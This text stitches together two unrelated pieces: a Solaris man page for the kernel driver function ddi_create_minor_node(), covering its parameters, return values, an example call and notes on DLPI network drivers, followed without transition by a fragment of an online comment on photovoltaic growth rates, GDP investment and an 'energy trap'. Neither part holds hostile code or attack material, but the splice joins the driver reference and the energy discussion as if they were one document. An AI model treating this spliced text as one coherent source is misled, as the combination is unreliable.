ddi_create_minor_node() provides the necessary information to enable the system to create the /dev and /devices hierarchies. The name is used to create the minor name of the block or character special file under the /devices hierarchy. At-sign (@), slash (/), and space are not allowed. The spec_type specifies whether this is a block or character device. The minor_num is the minor number for the device. The node_type is used to create the names in the /dev hierarchy that refers to the names in the /devices hierarchy. See disks(1M) , ports(1M), tapes(1M) , devlinks(1M). Finally flag determines if this is a clone device or not, and what device class the node belongs to.
ddi_create_minor_node() returns:
Was able to allocate memory, create the minor data structure, and place it into the linked list of minor devices for this driver.
Minor node creation failed.
The ddi_create_minor_node() function can be called from user context. It is typically called from attach(9E) or ioctl(9E).
The following example creates a data structure describing a minor device called foo which has a minor number of 0. It is of type DDI_NT_BLOCK (a block device) and it is not a clone device.
ddi_create_minor_node(dip, "foo", S_IFBLK, 0, DDI_NT_BLOCK, 0);
add_drv(1M), devlinks(1M), disks(1M), drvconfig(1M), ports(1M), tapes(1M), attach(9E), ddi_remove_minor_node(9F)
Writing Device Drivers for Oracle Solaris 11.2
If the driver is for a network device (node_type DDI_NT_NET), note that the driver name will undergo the driver name constraints identified in the NOTES section of dlpi (7P). Additionally, the minor name must match the driver name for a DLPI style 2 provider. If the driver is a DLPI style 1 provider, the minor name must also match the driver name with the exception that the ppa is appended to the minor name.
Non-gld(7D)-based DLPI network streams drivers are encouraged to switch to gld (7D). Failing this, a driver that creates DLPI style-2 minor nodes must specify CLONE_DEV for its style-2 ddi_create_minor_node() nodes and use qassociate(9F). A driver that supports both style-1 and style-2 minor nodes should return DDI_FAILURE for DDI_INFO_DEVT2INSTANCE and DDI_INFO_DEVT2DEVINFO getinfo(9E) calls to style-2 minor nodes. (The correct association is already established by qassociate(9F)). A driver that only supports style-2 minor nodes can use ddi_no_info(9F) for its getinfo(9E) implementation. For drivers that do not follow these rules, the results of a modunload(1M) of the driver or a cfgadm(1M) remove of hardware controlled by the driver are undefined.
Drivers must remove references to GLOBAL_DEV, NODEBOUND_DEV, NODESPECIFIC_DEV, and ENUMERATED_DEV to compile under Solaris 10 and later versions. | http://docs.oracle.com/cd/E36784_01/html/E36886/ddi-create-minor-node-9f.html | CC-MAIN-2016-22 | refinedweb | 600 | 54.22 |
On Wed, 19 May 2004 16:00:43 -0400 Jim Fulton <[EMAIL PROTECTED]> wrote:
Advertising
I've posted two proposals:
I have to say I am not found of "*",
I'm not attached to '*'. Feel free to suggest alternatives (other than ':', '/', '|', or '?'. Is that all ;)
> but using the parenthesis to "cast"
the variable seems fairly natural and isn't colored by completelt different meaning in other languages.
So the example: tal:content="x/y*foo.bar.baz/z"
would be: tal:content="x/(foo.bar.baz)y/z"
Yup
Which seems reasonable. The dotted notation seems ok, but it implies that this notation is recognized in general in path expressions which is confusing because it isn't. If we didn't use dots then it might look like: tal:content="x/(modules/foo/bar/baz)y/z"
I'm not sure what you mean here. If the thing in the parens was a path expression, it would be:
x/(modules/foo.bar/baz)y/z
IOW, modules excepts dotted names.
If the thing in the parenthesis is just another path expression, that mitigates the need for namespaces IMO. The above could then become: tal:define="baz modules/foo/bar/baz" tal:content="x/(baz)y/z"
True, but then, the obvious syntax would be:
x/baz(y)/z
which is the top of a slippery slope. :)
It would also make it harder to provide predefined adapter names.
We'd like to be able to define some adapters (e.g. 'zope', 'format', etc.) in ZCML and let people just use them in ZPT without having to use defines.
Jim
-- Jim Fulton mailto:[EMAIL PROTECTED] Python Powered! CTO (540) 361-1714 Zope Corporation
_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
** No cross posts or HTML encoding! **
(Related lists - ) | https://www.mail-archive.com/zope-dev@zope.org/msg16496.html | CC-MAIN-2016-44 | refinedweb | 295 | 66.33 |
I'm new to Dart and just learning the basics.
The Dart-Homepage shows following:
It turns out that Dart does indeed have a way to ask if an optional parameter was provided when the method was called. Just use the question mark parameter syntax.
Here is an example:
void alignDingleArm(num axis, [num rotations]) { if (?rotations) { // the parameter was really used } }
So I've wrote a simple testing script for learning:
import 'dart:html'; void main() { String showLine(String string, {String printBefore : "Line: ", String printAfter}){ // check, if parameter was set manually: if(?printBefore){ // check, if parameter was set to null if(printBefore == null){ printBefore = ""; } } String line = printBefore + string + printAfter; output.appendText(line); output.appendHtml("<br />\n"); return line; } showLine("Hallo Welt!",printBefore: null); }
The Dart-Editor already marks the questionmark as Error:
Multiple markers at this line - Unexpected token '?' - Conditions must have a static type of 'bool'
When running the script in Dartium, the JS-Console shows folloing Error:
Internal error: '': error: line 7 pos 8: unexpected token '?' if(?printBefore){ ^
I know, that it would be enough to check if printBefore is null, but I want to learn the language.
Does anyone know the reason for this problem? How to check, if the parameter is set manually? | http://www.howtobuildsoftware.com/index.php/how-do/f3J/syntax-dart-syntax-error-questionmark-checking-if-optional-parameter-is-provided-in-dart | CC-MAIN-2018-22 | refinedweb | 208 | 55.34 |
URL Rewriting
If your browser does not support cookies, URL rewriting provides you with another session tracking alternative. URL rewriting is a method in which the requested URL is modified to include a session ID. There are several ways to perform URL rewriting. You are going to look at one method that is provided by the Servlet API. Listing 5.3 shows an example of URL rewriting.
Listing 5.3 URLRewritingServlet.java
import javax.servlet.*; import javax.servlet.http.*; import java.io.*; import java.util.*; public class URLRewritingServlet extends HttpServlet { //Initialize global variables public void init(ServletConfig config) throws ServletException { super.init(config); } //Process the HTTP Get request public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html"); PrintWriter out = response.getWriter(); out.println("<html>"); out.println("<head><title>URL Rewriting</title></head>"); out.println("<body>"); // Encode a URL string with the session id appended // to it. String url = response.encodeRedirectURL( ""); // Redirect the client to the new URL response.sendRedirect(url); out.println("</body></html>"); out.close(); } //Get Servlet information public String getServletInfo() { return "URLRewritingServlet Information"; } }
This servlet services a GET request and redirects the client to a new URL. This new URL has the string sid=5748 appended to it. This string represents a session ID. When the servlet that services the redirection receives the request, it will be able to determine the current user based on the appended value. At that point, the servlet can perform a database lookup on the user and her actions based on this ID.
Two methods are involved in this redirection. The first is HttpServletResponse.encodeRedirectURL(), which takes a String that represents a redirection URL and encodes it for use in the second method. The second method used is the HttpServletRequest.sendRedirect() method. It takes the String returned from the encodeRedirectString() and sends it back to the client for redirection.
The advantage of URL rewriting over hidden form fields is the capability to include session tracking information without the use of forms. Even with this advantage, it is still a very arduous coding process. | http://www.informit.com/articles/article.aspx?p=131027&seqNum=5 | CC-MAIN-2019-04 | refinedweb | 345 | 50.43 |
What is symbol and symbol visibility
Symbol is one of the basic terms when talking about object files, linking, and so on. In fact, in C/C++ language, symbol is the corresponding entity of most user-defined variables, function names, mangled with namespace, class/struct/name, and so on. For example, a C/C++ compiler may generate symbols in an object file when people define non-static global variables or non-static functions, which are useful for the linker to decide if different modules (object files, dynamic shared libraries, executables) would share same data or code.
Though both variables and functions may be shared among modules, variable sharing is more common among object files. For example, a programmer may declare a variable in a.c:
extern int shared_var;
And, define it in b.c:
int shared_var;
Thus, both symbol
shared_var appears in compiled object a.o, b.o, and symbol in a.o may share the address of b.o finally after linker’s resolution. However, it is rare that people make variables shared amongd shared libraries and executables. And for such modules, it is very common to make only functions visible to the others. Sometimes we call such functions API, as the module is deemed to provide such interfaces for others to call into. We also say such symbols are exported since it is visible to the others. Notice that such visibility only takes effect at dynamic linking time since shared libraries are commonly loaded as part of memory image at program runs. Therefore, symbol visibility comes to be an attribute for all global symbols for dynamic linking.
Why need to control symbol visibility
On different platforms, the XL C/C++ compiler might choose either to export all the symbols in modules or not. For example, when creating Executable and Linking Format (ELF) shared libraries on the IBM PowerLinux™ platform, by default, all the symbols are exported. While creating an XCOFF library on AIX that runs on the POWER platform, current XL C/C++ compiler may choose not to export any without the assistance of a tool. And there are still some other ways to allow a programmer to determine symbol visibility one by one. (That is what we will introduce in the next part of this series.) However, generally it is not recommended to export all the symbols in modules. Programmers can just export symbols as needed. This does not only benefit library security, but also benefits dynamic linking time.
When programmers choose to export all symbols, there exists a high risk to get symbol collision at linking time, especially when modules are developed by different programmers. Because symbol is a low-level concept, it does not get scope involved. As soon as one links against a library with the same symbol names as that of yours, the library might accidentally overwrite your own symbols as linker’s resolution is done (hopefully there is some warning or error information given). And, in most cases, such symbols are never expected to be used from the library designer’s perspective. Therefore, creating only limited, (characterized by careful thought) meaningful names for the symbols can help a lot on such issues.
For C++ programming, nowadays there is a growing requirement for performance. However, due to dependencies against other libraries and using of specific C++ features such as templates, compiler/linker tend to use and generate a huge amount of symbols. Therefore, exporting all symbols slows down the program and costs massive memory. Exporting limited number of symbols can reduce the loading and linking time for dynamic shared libraries. Furthermore, it also enables optimization from the compiler’s perspective, which means more efficient code could be generated.
The above drawbacks of exporting all symbols explain why defining symbol visibility is mandatory. In this article, we provide solutions to make symbols in the dynamic shared object (DSO) be under control. Users can identify different ways to solve the same problem, and we also propose which one should be preferred on a specific platform.
Ways to control symbol visibility
In the discussions below, we will make use of the following C++ code snippet:
Listing 1. a.C
int myintvar = 5; int func0 () { return ++myintvar; } int func1 (int i) { return func0() * i; }
In a.C, we define one variable
myintvar, and two functions
func0 and
func1. By default, when creating a shared library on the AIX platform, the compiler and linker along with the CreateExportList tool would make all three symbols visible. We can check it from the Loader Symbol Table Information with the
dump binary tool:
$ xlC -qpic a.C -qmkshrobj -o libtest.a $ dump -Tv libtest.a ***Loader Symbol Table Information*** [Index] Value Scn IMEX Sclass Type IMPid Name [0] 0x20000280 .data EXP RW SECdef [noIMid] myintvar [1] 0x20000284 .data EXP DS SECdef [noIMid] func0__Fv [2] 0x20000290 .data EXP DS SECdef [noIMid] func1__Fi
Here, “EXP” means the symbol is “exported”. The function names
func0 and
func1 are mangled with C++ mangling rules. (However, it is not hard to guess.) The
-T option of
dump tool shows the Loader Symbol Table Information, which would be used by the dynamic linker. In this case, all the symbols in a.C are exported. But from the perspective of a library writer, we may want to export only
func1 for this case. Global symbol
myintvar and function
func0 are deemed as keeping/changing internal status only, or say just locally used. Thus making them invisible is important for the library writer.
We may at least have three ways to achieve this goal. This include: Using the static keyword, defining the GNU visibility attribute, and using an export list. Each of them has unique functionality and (may be) drawbacks as well. We shall look into them now.
1. Using the static keyword
The static keyword in C/C++ may be an overloaded keyword as it can specify both the scope and the storage for the variable. For scope, we may say that it disables the external linkage for the symbol in file. That means that the symbol with the keyword, static would never be linkable as the compiler does not leave any information for the linker about this symbol. It is a language-level control and it is the simplest way to hide the symbol.
Let us add the static keyword to the above case:
Listing 2. b.C
static int myintvar = 5; static int func0 () { return ++myintvar; } int func1 (int i) { return func0() * i; }
When we generate the shared library and look in to the Loader Symbol Table Information again, it works as expected:
$ xlC -qpic a.C -qmkshrobj -o libtest.a $ dump -Tv libtest.a ***Loader Symbol Table Information*** [Index] Value Scn IMEX Sclass Type IMPid Name [0] 0x20000284 .data EXP DS SECdef [noIMid] func1__Fi
Now, only
func1 is exported as the information shows. However, though the static keyword can hide the symbol, it also defines an extra rule that variables or functions can only be used within the file scope where it is defined. Thus, if we define:
extern int myintvar;
Later, in file b.C you may want to build libtest.a from both a.o and b.o. When you do so, the linker would display an error message stating that
myintvar defined in b.C cannot be linked, because the linker did not find a definition elsewhere. That breaks the data/code sharing inside the same module, which the programmer would generally require. Thus, it is more used as a visibility control of variables/functions inside the file, rather than for visibility control of low-level symbols. In fact, most of them would not rely on the static keyword to control symbol visibility. Therefore, we can consider the second method:
2. Defining the visibility attribute (GNU only)
The next candidate to control symbol visibility is to use the visibility attribute. The ELF application binary interface (ABI) defines the visibility of symbols. Generally, it defines four classes, but in most cases, only two of them are more commonly used:
STV_DEFAULT- Symbols defined with it will be exported. In other words, it declares that symbols are visible everywhere.
STV_HIDDEN- Symbols defined with it will not be exported and cannot be used from other objects.
Notice that this is an extension for GNU C/C++ only. Thus currently, PowerLinux customers can use it as GNU attribute for symbols. Here is an example for our case:
int myintvar __attribute__ ((visibility ("hidden"))); int __attribute__ ((visibility ("hidden"))) func0 () { return ++myintvar; } ...
To define a GNU attribute, you need to include
__attribute__ and the parenthesized (double parenthesis) content. You can specify the visibility of symbols as
visibility(“hidden”). In the above case, we can mark
myintvar and
func0 as
hidden visibility. This doesn not allow them to get exported in the library, but can be shared among source files. In fact, the hidden symbols would not appear in the dynamic symbol table, but is left in the symbol table for static linking purpose. That is a well-defined behavior and can definitely achieve our goal. It obviously surpasses the static keyword solution.
Notice that, for the variable specified with the
visibility attribute, declaring it as static might confuse the compliler. As a result, the compiler would display a warning message.
The ELF ABI also defines other visibility modes:
- STV_PROTECTED: The symbol is visible outside the current executable or shared object, but it may not be overridden. In other words, if a protected symbol in a shared library is referenced by an other code in the shared library, the other code will always reference the symbol in the shared library, even if the executable defines a symbol with the same name.
- STV_INTERNAL: The symbol is not accessible outside the current executable or shared library.
Notice that currently, this method is not supported by the XL C/C++ compiler, yet even on the PowerLinux platform. But still, we have other way out.
3. Using the export list
The above two solutions can take effect at the source-code level and only require the compiler to make the functionality achieved. However, it is essential for users to have the ability to tell the linker to perform similar work as symbol visibility gets involved mainly in dynamic linking. The solution for the linker is the export list.
The export list would be generated by the compiler (or related tools, such as CreateExportlist) automatically at the time of creating the shared library. It can also be written by the developer manually. An export list is passed into and treated as input for the linker by the linker option. However, as the compiler driver would do all trivial work, the programmer seldom takes much care of very detailed options.
The idea of the export list is to explicitly instruct the linker about the symbols that can be exported from the object files through an external file. GNU people named such an external file as “export map”. We can write an export map for our case:
{ global: func1; local: *; };
The above description tells the linker that only the
func1 symbol is going to be exported, and other symbols (matched by *) are local. The programmer can also explicitly list
func0 or
myintvar as local symbols (local:func0;myintvar;). But obviously, catch-all (*) is more convenient. And generally speaking, using the catch-all(*) case to mark all the symbols as locals and only picking out the ones that need to be exported is highly recommended because it is safer. It avoids users forgetting to keep some symbols local and also avoids duplication in both lists, which may cause an unexpected behavior.
To generate a DSO with this method, the programmer has to pass the export map file with the
--version-script linker option:
$ gcc -shared -o libtest.so a.C -fPIC -Wl,--version-script=exportmap
Reading the ELF object file with the
readelf binary ultility together with the
-s option:
readelf -s mylib.so
It would show that only
func1 is globally visible for this module (entries in section .dynsym), and other symbols are hidden as local.
For the IBM AIX OS linker, a similar export list is provided. To be exact, the export list is called the export file on AIX.
Writing an export file is simple. The programmer just needs to put the symbols that are needed to be exported into the export file. In our case, it is just as simple as shown below:
func1__Fi // symbol name
Thus, when we specify the export file with a linker option, the only symbol we want to export is added into the “loader symbol table” for XCOFF, while the others are kept as un-exported.
And for AIX 6.1 and above version, programmer may even append a visibility attribute to describe the visibility of symbols in the export file. The AIX linker now accepts 4 of such visibility attribute types:
export: Symbol is exported with the global export attribute.
hidden: Symbol is not exported.
protected: Symbol is exported but cannot be rebound (preempted), even if runtime linking is being used.
internal: Symbol is not exported. The address of the symbol must not be provided to other programs or shared objects, but the linker does not verify this.
The distinctions between
export and
hidden are obvious. However, the distinctions between
exported and
protected are subtle. We will continue to talk about symbol preemption in the next section with better description.
Anyway, the above four keywords are available in the export file. By appending them (with a blank) to the tail of symbol, it will provide different granularity controlling of symbol visibility. In this case, we can also specify symbol visibility (on AIX 6.1 and later versions) as shown below:
func1__Fi export func0__Fv hidden myintvar hidden
This informs the linker that only
func1__Fi(that is,
func1) will be exported, and others will not be exported.
You may notice that, unlike the GNU export map, the symbols listed in the export file are all mangled names. Mangled names do not look so friendly because the programmer may not be aware of the rule of mangling. But, it does help the linker to quickly do name resolution. To close this gap, the AIX OS chooses to utilize a tool to help programmer.
To be short, if the programmer specifies the
-qmkshrobj option while invoking the XL C/C++ compiler, the compiler driver invokes the
CreateExportList tool to generate the export file that holds the names of the mangled symbols automatically, after the compiler successfully generates the object file. The compiler driver then passes the export file to the linker to process the symbol visibility setting. Considering this example, if we invoke:
$ xlC -qpic a.C -qmkshrobj -o libtest.a
The libtest.a library is generated with all the symbols exported (this is default). Though it does not achieve our goal, at least the whole process looks transparent to the programmer. And, the programmer can also choose to use the
CreateExportList utility to generate the export file instead. If you choose this way, you are now able to modify the export file manually. For example, suppose the export file name you want is exportfile, then
qexpfile=exportfile is the option you need to pass to the XL C/C++ compiler driver.
$ xlC -qmkshrobj -o libtest.a a.o -qexpfile=exportfile
In this case, you can find out all the symbols as shown below:
func0__Fv func1__Fi myintvar
Based on our requirement, we can either simply remove lines with the
myintvar,
func0, or append the
hidden visibility keyword after them, and then save the export file and use the linker option
-bE:exportfile to pass the refined export file back.
$ xlC -qmkshrobj -o libtest.a a.o -bE:exportfile
That would finalize all the steps. Now the generated DSO will not have
func1__Fi(that is,
func1) exported:
$ dump -Tv libtest.a ***Loader Symbol Table Information*** [Index] Value Scn IMEX Sclass Type IMPid Name [0] 0x20000284 .data EXP DS SECdef [noIMid] func1__Fi
Alternatively, the programmer can also use the
CreateExportList utility to explicitly generate the export file as shown below:
$ CreateExportList exportfile a.o
In our case, it works exactly as the one above.
For the new format on AIX 6.1 and later versions, appending the keyword for symbol visibility one by one might require more effort. However, the XL C/C++ compiler is planning to make some changes to make life easier for programmer. (Related information will be provided in the next part in this series.)
In the export list solution, all the information is kept in the export list and programmers do not need to change the source file. It separates the work of code development and library development. However, we might face an issue with such a process. As we keep the source file unmodified, the binary code compiler generated might not be optimal. The compiler misses the chance to optimize symbols that are not exported due to lack of information. It would either increase the binary size generated or slow down the process of symbol resolution. However, this is not a major issue for most of the applications.
The following table compares all the above solutions and makes the view centralized.
Table 1. Comparison of each solution
Symbol preemption
As we mentioned above, there is a subtle distinction between the visibility keywords
export and
protected. And the subtle distinction is about symbol preemption. Symbol preemption occurs when the symbol address resolved at link time is replaced with another symbol address resolved at runtime (notice that runtime linking is optional on AIX though). Conceptually, runtime linking would resolve undefined and non-deferred symbols in shared modules after the program execution has begun. It is a mechanism for providing runtime definitions (these function definitions are not available at link time) and symbol rebinding capabilities. On AIX, when the main program is linked with the
-brtl flag or when preloaded libraries are specified with the
LDR_CNTRL environment variable, the program is able to use the runtime linking facility. Compiling with
-brtl adds a reference to the dynamic linker to the program, which will be called by the program's startup code (/lib/crt0.o) when the program begins to run. Shared object input files are listed as dependents in the program loader section in the same order as they are specified in the command line. When the program begins to run, the system loader loads these shared objects so that their definitions are available to the dynamic linker.
Thus, the functionality of redefining the items in shared objects at runtime is called symbol preemption. Symbol preemption is only possible on AIX when runtime linking is used. Imports bound to a module at link time can be rebound to another module at runtime. Whether a local definition can be preempted by an imported instance depends on the way the module was linked. However, a non-exported symbol can never be preempted at runtime. When the runtime loader loads a component, all the symbols within the component that have the default visibility are subject to preemption by symbols of the same name in components that are already loaded. Note that because the main program image is always loaded first, none of the symbols defined by it will be preempted (redefined).
A protected symbol is exported, but it is not preemptible. In contrast, an exported symbol is exported and can be preempted (if runtime linking is used).
For default symbols, there is a difference between Linux® and AIX. The GNU compilers and ELF file format define a default visibility, which is used for symbols that are exported and preemptible. This is similar to the exported visibility defined on AIX.
The following code takes the AIX platform as an example.
Listing 3. func.C
#include <stdio.h> void func_DEFAULT(){ printf("func_DEFAULT in the shared library, Not preempted\n"); } void func_PROC(){ printf("func_PROC in the shared library, Not preempted\n"); }
Listing 4. invoke.C
extern void func_DEFAULT(); extern void func_PROC(); void invoke(){ func_DEFAULT(); func_PROC(); }
Listing 5. main.C
#include <stdio.h> extern void func_DEFAULT(); extern void func_PROC(); extern void invoke(); int main(){ invoke(); return 0; } void func_DEFAULT(){ printf("func_DEFAULT redefined in main program, Preempted ==> EXP\n"); } void func_PROC(){ printf("func_PROC redefined in main program, Preempted ==> EXP\n"); }
In the above description, we defined
func_DEFAULT and
func_PROC both in func.C and main.C. They have the same names but with different behaviors. A function
invoke from invoke.C will call
func_DEFAULT and
func_PROC in sequence. We will use the following exportlist code to see if symbols are exported and how they are exported.
Listing 6. exportlist
func_DEFAULT__Fv export func_PROC__Fv protected invoke__Fv
If you are using the linker version before to AIX 6.1, you may use a blank space instead of
export, and the
symbolic keyword instead of the
protected keyword. The command for building the libtest.so library and the main executable are listed in the following code:
/* generate position-independent code suitable for use in shared libraries. */ $ xlC -c func.C invoke.C -qpic /* generate shared library, exportlist is used to control symbol visibility */ $ xlC -G -o libtest.so func.o invoke.o -bE:exportlist $ xlC -c main.C /* -brtl enable runtime linkage. */ $ xlC main.o -L. -ltest -brtl -bexpall -o main
Basically, we construct libtest.so from func.o and invoke.o. We use
exportlist to set
func_DEFAULT from func.C and
func_PROC from func.C as exported symbols, but still protected. Thus libtest.so has two exported symbols and one protected symbol. For the main program, we export all the symbols from main.C, but link it to libtest.so. Notice that we use the
-brtl flag to enable dynamic linking for libtest.so.
The next step is to invoke the main program.
$ ./main func_DEFAULT redefined in main program, Preempted ==> EXP func_PROC in the shared library, Not preempted
Here we see something interesting:
func_DEFAULT is the version from main.C, while
func_PROC is the version from libtest.so (func.C). The
func_DEFAULT symbol is preempted because the local version (we say it is local because the calling function invoke is from invoke.C, which is basically in the same module with
func_DEFAULT from func.C) from libtest.so is replaced by the one from another module. However, same condition does happen on
func_PROC, which is specified as protected visibility in the export file.
Notice that the symbol that can preempt others should always be exported. Suppose we remove the
-bexpall option while building the executable main, the output is as shown below:
$ xlC main.o -L. -ltest -brtl -o main; //-brtl enable runtime linkage. $ ./main func_DEFAULT in the shared library, Not preempted func_PROC in the shared library, Not preempted
Here no preemption happens. All the symbols are kept as same version in module.
In fact, to check if a symbol is exported or even protected at runtime, we can make use of the
dump utility:
$ dump -TRv libtest.so libtest.so: ***Loader Section*** ***Loader Symbol Table Information*** [Index] Value Scn IMEX Sclass Type IMPid Name [0] 0x00000000 undef IMP DS EXTref libc.a(shr.o) printf [1] 0x2000040c .data EXP DS SECdef [noIMid] func_DEFAULT__Fv [2] 0x20000418 .data EXP DS SECdef [noIMid] func_PROC__Fv [3] 0x20000424 .data EXP DS SECdef [noIMid] invoke__Fv ***Relocation Information*** Vaddr Symndx Type Relsect Name 0x2000040c 0x00000000 Pos_Rel 0x0002 .text 0x20000410 0x00000001 Pos_Rel 0x0002 .data 0x20000418 0x00000000 Pos_Rel 0x0002 .text 0x2000041c 0x00000001 Pos_Rel 0x0002 .data 0x20000424 0x00000000 Pos_Rel 0x0002 .text 0x20000428 0x00000001 Pos_Rel 0x0002 .data 0x20000430 0x00000000 Pos_Rel 0x0002 .text 0x20000434 0x00000003 Pos_Rel 0x0002 printf 0x20000438 0x00000004 Pos_Rel 0x0002 func_DEFAULT__Fv 0x2000043c 0x00000006 Pos_Rel 0x0002 invoke__Fv
This is the output from libtest.so. We may find that
func_DEFAULT__Fv and
func_PROC__Fv are all exported. However,
func_PROC__Fv does not have any relocations. It means that the loader may not be able to find a way to replace the address of
func_PROC from TOC table. And the address of
func_PROC in TOC table is where the function invokes transfer control to. Therefore,
func_PROC does not appear to be preempted. We then realize that it is protected.
Symbol preemption is rarely used in fact. However, it leaves a possibility that people replace the symbol dynamically at run time but also leave some security holes. If you do not want key symbols in your library to be preempted (but still need to export it for use), you need to make it protected for safety.
Acknowledgments
We would like to thank Dr. Jinsong Ji for reviewing and providing valuble suggestions on this article.
Resources
- Get basic visibility concept from the GCC wiki. It also explains why visibility is useful and how to use the visibility attribute.
- Get to know how to work with GNU export maps, which enable GNU linker to properly set symbol visibility at linking time.
- Get to know the basic concept of Library on wiki, and some related concepts involved.
- Formal introduction to Symbols from the IBM AIX documentation.
- Formal introduction to Shared library and shared memory from the IBM AIX 6.1 documentation
- Details about the ld command from the IBM AIX 6.1 documentation.
- Individual option description of -brtl from the IBM AIX 6.1 documentation.
- Accurate definition of Symbol Visibility from the IBM AIX 6.1 documentation.. | https://www.ibm.com/developerworks/aix/library/au-aix-symbol-visibility/ | CC-MAIN-2016-30 | refinedweb | 4,194 | 56.25 |
AvgPool2D: How to Incorporate Average pooling into a PyTorch Neural Network
AvgPool2D - Use the PyTorch AvgPool2D Module to incorporate average pooling into a PyTorch neural network
< > Code:
Transcript:
It is common practice to use either max pooling or average pooling at the end of a neural network but before the output layer in order to reduce the features to a smaller, summarized form.
Max pooling strips away all information of the specified kernel except for the strongest signal.
Average pooling summarizes the signal in the kernel to a single average.
The displayed example network
import torch.nn as nn.avg_pool("AvgPool1", nn.AvgPool2D(kernel_size=4, stride=4, padding=0, ceil_mode=False, count_include_pad=False)) self.fully_connected = nn.Linear(32 * 4 * 4, num_classes) def forward(self, x): y = x.clone() x = self.layer1(x) x = self.layer2(x) x = self.avg_pool(x) x = x.view(-1, 32 * 4 * 4) x = self.fully_connected(x) return x
uses the AvgPool2D function
self.avg_pool("AvgPool1", nn.AvgPool2D(kernel_size=4, stride=4, padding=0, ceil_mode=False, count_include_pad=False))
to perform average pooling on the output of the second convolutional layer.
The kernel size argument
kernel_size=4
is required and determines how large of an area the average pooling has taken over.
I chose 4 because it evenly divides the height and width of the output of the Conv2d layer above it which is 16x16.
The stride
stride=4
can be specified as smaller or larger than the kernel size but having it be equal to the kernel size ensures that there is no overlap in the output averages, as is the case if the stride is less than the kernel size, and then no values are skipped over as is the case if the stride is greater than the kernel size.
This value defaults to kernel size.
Padding
padding=0
is the implicit zero padding to be added to the edges of the inputs before calculation.
This can be useful if your kernel size does not evenly divide the height and width of the input features.
This will default to zero.
Average pooling needs to compute a new output shape.
This is usually calculated using a formula
ceil_mode=False
involving the kernel size, stride, padding, and shape of the inputs, then taking the floor of that calculation.
This can be changed to the ceiling by setting ceil_mode=True.
count_include_pad
count_include_pad=False
becomes relevant if you have added implicit zero padding.
In that case, setting count_include_pad to true will instruct avg_pool to include the zero padding when calculating its averages.
After the average pool layer is set up, we simply need to add it to our forward method.
x = self.avg_pool(x)
One last thing, the input dimensions of the fully connected output layer need to be changed to match average pool as average pool changes the shape of layer2’s outputs.
self.fully_connected = nn.Linear(32 * 4 * 4, num_classes)
The input dimension is now 32x4x4 because average pool has reduced the height and width of each feature map to 4.
This needs to also be updated in the view function so it is opening tensors to the desired shape.
x = x.view(-1, 32 * 4 * 4) | https://aiworkbox.com/lessons/avgpool2d-how-to-incorporate-average-pooling-into-a-pytorch-neural-network | CC-MAIN-2020-40 | refinedweb | 530 | 55.74 |
The project is currently up on Github.
I will let them describe it in their own words:. implement the full Flash display system.
And:
Features:
Native Performance
- Using “unsafe” code.
- Direct interop with native code (Cocos2D-X, other C++ based engines such as Page44, etc).
- Optimized compiler for JavaScript generation.
- Optional full C++ target with minimal app size and startup overhead.
Advanced Tools Support
- Complete tool support including Syntax Highlighting and intellisense in the MonoDevelop IDE.
- Source Debugging on all platforms (FlashBuilder for Flash).
- Fast Release mode compiles and rapid iteration.
Full Platform API’s
- Complete iOS platform API via Xamarin MonoTouch and Mono for Android
- Complete Windows/MacOSX API’s.
- Complete integration with UI builder (iOS), and Android GUI builder via Xamarin Studio.
Differences between PlayScript and ActionScript
- PlayScript supports most features of C# 5.
- PlayScript requires semicolons after all statements.
- PlayScript uses block scoping for variables.
- PlayScript requires breaks in switch statements.
- PlayScript supports generics using the .<> syntax introduced in AS3 with the normal C# feature set.
- PlayScript supports properties using the “property” keyword with syntax similar to C#.
- PlayScript supports indexers and operator overloads using the “indexer” and “operator” keywords.
- PlayScript implements AS3 namespaces by converting them to .NET internal.
Differences between PlayScript and CSharp
- PlayScript requires the use of the “overload” keyword on addtional overload methods (allows more readable JavaScript code by only mangling overload method names).
- PlayScript does not support using blocks.
- PlayScript does not support checked, unchecked.
- PlayScript does not “presently” support unsafe code (though this will be added in the future). Currently unsafe code can be added to mobile projects via C#.
- In PlayScript you may not directly access the base properties of Object (ToString(), GetType(), GetHashCode()) unless you cast an objet to a System.Object. Doing this however will make your code incompatible with the C++ or JavaScript target backends.
The provided the following example code:
// public static operator - (i:int, j:int):int { } // Indexers public indexer this (index:int) { get { return _a[index]; } set { _a[index] = value; } } // Generics public class Foo.<T> { public var _f:T; public function foo<T>(v:T):void { } } // Async async function AccessTheWebAsync():Task.<int> { var client:HttpClient= new HttpClient(); var getStringTask:Task.<String> = client.GetStringAsync(""); var urlContents:String = await getStringTask; return urlContents.Length; }
Very interesting. So basically they are making a HaXe like cross platform tool based on a hybrid of ActionScript and C#, targeting existing Stage3D libraries.
News Programming | https://gamefromscratch.com/zynga-release-playscript-a-c-5-actionscript-hybrid-that-targets-the-mono-runtime/ | CC-MAIN-2021-04 | refinedweb | 404 | 60.21 |
Topic talk:Topics
From Wikiversity
Topic:Topics is a discussion of Topic:Topics which is a learning project to classify all Topic:topic pages on Wikiversity. There is a similar project at Portal:Portals. CQ 01:26, 2 November 2006 (UTC)
[edit] New topic template
I've changed the {{topic}} template:
[[Topic:{{{1}}}|{{{1}}}]] ([[wikt:{{{1}}}|wiktionary]] | [[w:{{{1}}}|wikipedia]] | [[b:{{{1}}}|wikibooks]])
Using {{topic|<some topic>}} produces links to wiktionary entries, wikipedia articles and wikibooks items with the same name. To increase the interoperability of page names, use only initial capitals as a general rule. You may have to follow the links produced to create redirects if necessary. The idea is to interlink the Topic: namespace with other Wikimedia projects. CQ 01:04, 1 June 2007 (UTC)
- There is Special:random/topic. Is it not good enough? Hillgentleman|Talk 04:39, 2 June 2007 (UTC) | http://en.wikiversity.org/wiki/Topic_talk:Topics | crawl-002 | refinedweb | 146 | 57.37 |
.)
Sorry. I don't understand well your tables.
Are you proposing a fixed percentage investment over GDP?
One of the problems of the PV expansion is that takes time. The infrastructure (factories) grows exponentialy, but at manageable percentage.
For example, taking the BP data (see my old discussion in the other post) now renewable is growing at 15%, while PV is growing at 32%.
Perhaps renewable could grow slightly faster, but it's not realistic to expect over 50% growth at worldwide scale when the numbers are not very small.
So the PV deployment speed is mainly driven by inteslf, not GDP.
Perhaps, only, if this energy trap reach the numbers of PV growth, then they could limit the PV expansion.
